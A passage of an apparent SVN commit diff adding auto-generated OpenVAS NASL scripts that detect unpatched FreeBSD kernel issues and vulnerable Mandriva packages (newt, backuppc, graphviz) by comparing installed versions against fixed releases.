Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65014); + script_version ("$"); + script_name("FreeBSD Security Advisory (FreeBSD-SA-09:14.devfs.asc)"); + + desc = " +The remote host is missing an update to the system +as announced in the referenced advisory FreeBSD-SA-09:14.devfs.asc + +The device file system (devfs) provides access to system devices, such as +storage devices and serial ports, via the file system namespace. + +VFS is the Virtual File System, which abstracts file system operations in +the kernel from the actual underlying file system. + +Due to the interaction between devfs and VFS, a race condition exists +where the kernel might dereference a NULL pointer. + +Solution: +Upgrade your system to the appropriate stable release +or security branch dated after the correction date + +https://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-09:14.devfs.asc +Risk factor : High"; + + script_description(desc); + + script_summary("FreeBSD Security Advisory (FreeBSD-SA-09:14.devfs.asc)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("FreeBSD Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/freebsdpatchlevel"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-bsd.inc"); +vuln = 0; +if(patchlevelcmp(rel:"7.2", patchlevel:"4")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"7.1", patchlevel:"8")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"6.4", patchlevel:"7")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"6.3", patchlevel:"13")<0) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/freebsdsa_pipe1.nasl =================================================================== --- trunk/openvas-plugins/scripts/freebsdsa_pipe1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/freebsdsa_pipe1.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,84 @@ +# +#ADV FreeBSD-SA-09:13.pipe.asc +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from ADV FreeBSD-SA-09:13.pipe.asc +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65013); + script_version ("$"); + script_name("FreeBSD Security Advisory (FreeBSD-SA-09:13.pipe.asc)"); + + desc = " +The remote host is missing an update to the system +as announced in the referenced advisory FreeBSD-SA-09:13.pipe.asc + +Pipes are a form of inter-process communication (IPC) provided by the +FreeBSD kernel. kqueue is an event management API that applications can +use to monitor pipes and other kernel services. + +A race condition exists in the pipe close() code relating to kqueues, +causing use-after-free for kernel memory, which may lead to an +exploitable NULL pointer vulnerability in the kernel, kernel memory +corruption, and other unpredictable results. + +Solution: +Upgrade your system to the appropriate stable release +or security branch dated after the correction date + +https://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-09:13.pipe.asc +Risk factor : High"; + + script_description(desc); + + script_summary("FreeBSD Security Advisory (FreeBSD-SA-09:13.pipe.asc)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("FreeBSD Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/freebsdpatchlevel"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-bsd.inc"); +vuln = 0; +if(patchlevelcmp(rel:"6.4", patchlevel:"7")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"6.3", patchlevel:"13")<0) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/mdksa_2009_249.nasl =================================================================== --- trunk/openvas-plugins/scripts/mdksa_2009_249.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/mdksa_2009_249.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,185 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory MDVSA-2009:249 (newt) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64995); + script_cve_id("CVE-2009-2905"); + script_version ("$"); + script_name("Mandrake Security Advisory MDVSA-2009:249 (newt)"); + + desc = " +The remote host is missing an update to newt +announced via advisory MDVSA-2009:249. + +A vulnerability was discovered and corrected in newt: + +A heap-based buffer overflow flaw was found in the way newt processes +content that is to be displayed in a text dialog box. A local attacker +could issue a specially-crafted text dialog box display request +(direct or via a custom application), leading to a denial of service +(application crash) or, potentially, arbitrary code execution with the +privileges of the user running the application using the newt library +(CVE-2009-2905). + +This update provides a solution to this vulnerability. + +Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, + Enterprise Server 5.0, Multi Network Firewall 2.0 + + +Solution: +To upgrade automatically use MandrakeUpdate or urpmi. The verification +of md5 checksums and GPG signatures is performed automatically for you. + +https://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:249 + +Risk factor : High"; + + script_description(desc); + + script_summary("Mandrake Security Advisory MDVSA-2009:249 (newt)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Mandrake Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"libnewt0.52", rpm:"libnewt0.52~0.52.6~4.1mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52-devel", rpm:"libnewt0.52-devel~0.52.6~4.1mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.52.6~4.1mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52", rpm:"lib64newt0.52~0.52.6~4.1mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52-devel", rpm:"lib64newt0.52-devel~0.52.6~4.1mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52", rpm:"libnewt0.52~0.52.6~5.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52-devel", rpm:"libnewt0.52-devel~0.52.6~5.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.52.6~5.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52", rpm:"lib64newt0.52~0.52.6~5.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52-devel", rpm:"lib64newt0.52-devel~0.52.6~5.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52", rpm:"libnewt0.52~0.52.6~8.1mdv2009.1", rls:"MNDK_2009.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52-devel", rpm:"libnewt0.52-devel~0.52.6~8.1mdv2009.1", rls:"MNDK_2009.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.52.6~8.1mdv2009.1", rls:"MNDK_2009.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52", rpm:"lib64newt0.52~0.52.6~8.1mdv2009.1", rls:"MNDK_2009.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52-devel", rpm:"lib64newt0.52-devel~0.52.6~8.1mdv2009.1", rls:"MNDK_2009.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51", rpm:"libnewt0.51~0.51.6~7.1.C30mdk", rls:"MNDK_3.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51-devel", rpm:"libnewt0.51-devel~0.51.6~7.1.C30mdk", rls:"MNDK_3.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.51.6~7.1.C30mdk", rls:"MNDK_3.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.51", rpm:"lib64newt0.51~0.51.6~7.1.C30mdk", rls:"MNDK_3.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.51-devel", rpm:"lib64newt0.51-devel~0.51.6~7.1.C30mdk", rls:"MNDK_3.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51", rpm:"libnewt0.51~0.51.6~11.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51-devel", rpm:"libnewt0.51-devel~0.51.6~11.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.51.6~11.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.51", rpm:"lib64newt0.51~0.51.6~11.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.51-devel", rpm:"lib64newt0.51-devel~0.51.6~11.1.20060mlcs4", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52", rpm:"libnewt0.52~0.52.6~5.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.52-devel", rpm:"libnewt0.52-devel~0.52.6~5.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.52.6~5.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52", rpm:"lib64newt0.52~0.52.6~5.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64newt0.52-devel", rpm:"lib64newt0.52-devel~0.52.6~5.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51", rpm:"libnewt0.51~0.51.6~7.1.C30mdk", rls:"MNDK_2.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libnewt0.51-devel", rpm:"libnewt0.51-devel~0.51.6~7.1.C30mdk", rls:"MNDK_2.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"newt", rpm:"newt~0.51.6~7.1.C30mdk", rls:"MNDK_2.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/mdksa_2009_253.nasl =================================================================== --- trunk/openvas-plugins/scripts/mdksa_2009_253.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/mdksa_2009_253.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,85 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory MDVSA-2009:253 (backuppc) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64996); + script_cve_id("CVE-2009-3369"); + script_version ("$"); + script_name("Mandrake Security Advisory MDVSA-2009:253 (backuppc)"); + + desc = " +The remote host is missing an update to backuppc +announced via advisory MDVSA-2009:253. + +A vulnerability was discovered and corrected in backuppc: + +CgiUserConfigEdit in BackupPC 3.1.0, when SSH keys and Rsync are in +use in a multi-user environment, does not restrict users from the +ClientNameAlias function, which allows remote authenticated users to +read and write sensitive files by modifying ClientNameAlias to match +another system, then initiating a backup or restore (CVE-2009-3369). + +This update provides a fix for this vulnerability. + +Affected: Enterprise Server 5.0 + +Solution: +To upgrade automatically use MandrakeUpdate or urpmi. The verification +of md5 checksums and GPG signatures is performed automatically for you. + +https://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:253 + +Risk factor : High"; + + script_description(desc); + + script_summary("Mandrake Security Advisory MDVSA-2009:253 (backuppc)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Mandrake Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"backuppc", rpm:"backuppc~3.1.0~7.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/mdksa_2009_254.nasl =================================================================== --- trunk/openvas-plugins/scripts/mdksa_2009_254.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/mdksa_2009_254.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,325 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory MDVSA-2009:254 (graphviz) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64997); + script_cve_id("CVE-2008-4555"); + script_version ("$"); + script_name("Mandrake Security Advisory MDVSA-2009:254 (graphviz)"); + + desc = " +The remote host is missing an update to graphviz +announced via advisory MDVSA-2009:254. + +A vulnerability was discovered and corrected in graphviz: + +Stack-based buffer overflow in the push_subg function in parser.y +(lib/graph/parser.c) in Graphviz 2.20.2, and possibly earlier versions, +allows user-assisted remote attackers to cause a denial of service +(memory corruption) or execute arbitrary code via a DOT file with a +large number of Agraph_t elements (CVE-2008-4555). + +This update provides a fix for this vulnerability. + +Affected: 2008.1, 2009.0, Corporate 4.0, Enterprise Server 5.0 + +Solution: +To upgrade automatically use MandrakeUpdate or urpmi. The verification +of md5 checksums and GPG signatures is performed automatically for you. + +https://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:254 + +Risk factor : High"; + + script_description(desc); + + script_summary("Mandrake Security Advisory MDVSA-2009:254 (graphviz)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Mandrake Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"graphviz", rpm:"graphviz~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz-doc", rpm:"graphviz-doc~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz4", rpm:"libgraphviz4~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-devel", rpm:"libgraphviz-devel~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizlua0", rpm:"libgraphvizlua0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizocaml0", rpm:"libgraphvizocaml0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizperl0", rpm:"libgraphvizperl0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizphp0", rpm:"libgraphvizphp0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizpython0", rpm:"libgraphvizpython0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizr0", rpm:"libgraphvizr0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizruby0", rpm:"libgraphvizruby0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-static-devel", rpm:"libgraphviz-static-devel~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviztcl0", rpm:"libgraphviztcl0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz4", rpm:"lib64graphviz4~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-devel", rpm:"lib64graphviz-devel~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizlua0", rpm:"lib64graphvizlua0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizocaml0", rpm:"lib64graphvizocaml0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizperl0", rpm:"lib64graphvizperl0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizphp0", rpm:"lib64graphvizphp0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizpython0", rpm:"lib64graphvizpython0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizr0", rpm:"lib64graphvizr0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizruby0", rpm:"lib64graphvizruby0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-static-devel", rpm:"lib64graphviz-static-devel~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviztcl0", rpm:"lib64graphviztcl0~2.16.1~3.2mdv2008.1", rls:"MNDK_2008.1")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz", rpm:"graphviz~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz-doc", rpm:"graphviz-doc~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz4", rpm:"libgraphviz4~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-devel", rpm:"libgraphviz-devel~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizlua0", rpm:"libgraphvizlua0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizocaml0", rpm:"libgraphvizocaml0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizperl0", rpm:"libgraphvizperl0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizphp0", rpm:"libgraphvizphp0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizpython0", rpm:"libgraphvizpython0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizr0", rpm:"libgraphvizr0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizruby0", rpm:"libgraphvizruby0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-static-devel", rpm:"libgraphviz-static-devel~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviztcl0", rpm:"libgraphviztcl0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz4", rpm:"lib64graphviz4~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-devel", rpm:"lib64graphviz-devel~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizlua0", rpm:"lib64graphvizlua0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizocaml0", rpm:"lib64graphvizocaml0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizperl0", rpm:"lib64graphvizperl0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizphp0", rpm:"lib64graphvizphp0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizpython0", rpm:"lib64graphvizpython0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizr0", rpm:"lib64graphvizr0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizruby0", rpm:"lib64graphvizruby0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-static-devel", rpm:"lib64graphviz-static-devel~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviztcl0", rpm:"lib64graphviztcl0~2.20.2~3.1mdv2009.0", rls:"MNDK_2009.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz", rpm:"graphviz~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz7", rpm:"libgraphviz7~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz7-devel", rpm:"libgraphviz7-devel~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviztcl7", rpm:"libgraphviztcl7~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviztcl7-devel", rpm:"libgraphviztcl7-devel~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz7", rpm:"lib64graphviz7~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz7-devel", rpm:"lib64graphviz7-devel~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviztcl7", rpm:"lib64graphviztcl7~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviztcl7-devel", rpm:"lib64graphviztcl7-devel~2.2.1~3.2.20060mdk", rls:"MNDK_4.0")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz", rpm:"graphviz~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"graphviz-doc", rpm:"graphviz-doc~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz4", rpm:"libgraphviz4~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-devel", rpm:"libgraphviz-devel~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizlua0", rpm:"libgraphvizlua0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizocaml0", rpm:"libgraphvizocaml0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizperl0", rpm:"libgraphvizperl0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizphp0", rpm:"libgraphvizphp0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizpython0", rpm:"libgraphvizpython0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizr0", rpm:"libgraphvizr0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphvizruby0", rpm:"libgraphvizruby0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviz-static-devel", rpm:"libgraphviz-static-devel~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libgraphviztcl0", rpm:"libgraphviztcl0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz4", rpm:"lib64graphviz4~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphviz-devel", rpm:"lib64graphviz-devel~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizlua0", rpm:"lib64graphvizlua0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizocaml0", rpm:"lib64graphvizocaml0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizperl0", rpm:"lib64graphvizperl0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizphp0", rpm:"lib64graphvizphp0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"lib64graphvizpython0", rpm:"lib64graphvizpython0~2.20.2~3.1mdvmes5", rls:"MNDK_mes5")) { + vuln = 1; +} 